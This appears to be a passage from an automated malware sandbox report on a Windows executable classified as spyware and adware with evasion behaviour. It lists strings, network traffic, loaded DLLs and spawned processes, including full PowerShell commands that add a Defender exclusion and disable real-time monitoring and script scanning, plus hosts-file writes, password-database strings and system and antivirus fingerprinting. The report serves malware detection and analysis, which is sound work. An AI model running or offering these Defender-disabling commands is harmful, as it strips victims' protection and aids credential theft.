Source: powershell.exe, 00000012.00000002.2408109229.000002CB34C04000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://gstatic.com
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://gstatic.com/generate_204
Source: apDMcnqqWs.exe, 4z5ru.scr.0.dr; String found in binary or memory: https://gstatic.com/generate_204g==================Divulge
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://mail.google.com/mail/:
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://mail.google.com/mail/J
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: powershell.exe, 00000002.00000002.2189157435.0000020110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D45E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43C43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/:
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/?feature=ytca
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49787 version: TLS 1.2

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	File written: C:\Windows\System32\drivers\etc\hosts
              Source: apDMcnqqWs.exe, 00000000.00000000.2102524227.000001ED082D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename vs apDMcnqqWs.exe
              Source: apDMcnqqWs.exe	Binary or memory string: OriginalFilename vs apDMcnqqWs.exe
              Source: apDMcnqqWs.exe	Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: apDMcnqqWs.exe, ------.cs	Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
              Source: 4z5ru.scr.0.dr, ------.cs	Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
              Source: 4z5ru.scr.0.dr, ------.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 4z5ru.scr.0.dr, ------.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: apDMcnqqWs.exe, ------.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: apDMcnqqWs.exe, ------.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engine	Classification label: mal100.adwa.spyw.evad.winEXE@27/22@2/2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\apDMcnqqWs.exe.log
              Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_03
              Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
              Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
              Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_03
              Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:936:120:WilError_03
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Mutant created: \Sessions\1\BaseNamedObjects\sW7ROjkdVeQ0ALYye0hE
              Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_03
              Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_03
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	File created: C:\Users\user\AppData\Local\Temp\G5kTuonXpDGStAt
              Source: apDMcnqqWs.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: apDMcnqqWs.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	File read: C:\Windows\System32\drivers\etc\hosts
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A74B000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A6E1000.00000004.00000800.00020000.00000000.sdmp, BjhcxNxxFR4N6Gf.0.dr, av2rxYk4uIkmjW3.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: apDMcnqqWs.exe	ReversingLabs: Detection: 87%
              Source: apDMcnqqWs.exe	Virustotal: Detection: 78%
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	File read: C:\Users\user\Desktop\apDMcnqqWs.exe
              Source: unknown	Process created: C:\Users\user\Desktop\apDMcnqqWs.exe "C:\Users\user\Desktop\apDMcnqqWs.exe"
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
              Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
              Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
              Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
              Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe'
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: version.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: dhcpcsvc6.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: dhcpcsvc.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: rasapi32.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: rasman.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: rtutils.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: secur32.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe	Section loaded: windowscodecs.dll
              Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll
              Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
              Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
